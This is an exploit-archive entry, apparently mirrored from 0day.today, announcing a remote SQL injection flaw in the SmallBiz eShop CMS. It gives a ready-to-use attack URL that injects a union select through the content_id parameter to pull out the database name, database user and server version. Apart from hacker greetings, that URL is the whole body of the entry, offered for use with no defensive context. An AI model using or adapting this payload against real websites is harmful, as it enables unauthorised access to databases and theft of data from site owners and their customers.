id: 2878
date: 04/13/2008
title: SmallBiz eShop (content_id) Remote SQL Injection Vulnerability
author: Stack
cves: 

==============================================================
SmallBiz eShop (content_id) Remote SQL Injection Vulnerability
==============================================================


###################################################
[~] Powered by SmallBiz eShop CMS Remote Sql Inj. Vuln.
                                                                                                               
[~] Founder: Stack-Terrorist [v40] [ Moroc00 Hacker ]
[~] Greatz : To all Hackerz from Moroc00 & All My Friends . . .
[~] Exploit :
http://www.xxx.co.il/index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(58),user(),char(58),version()),char)/*
---------------------



#  0day.today [2023-03-23]  #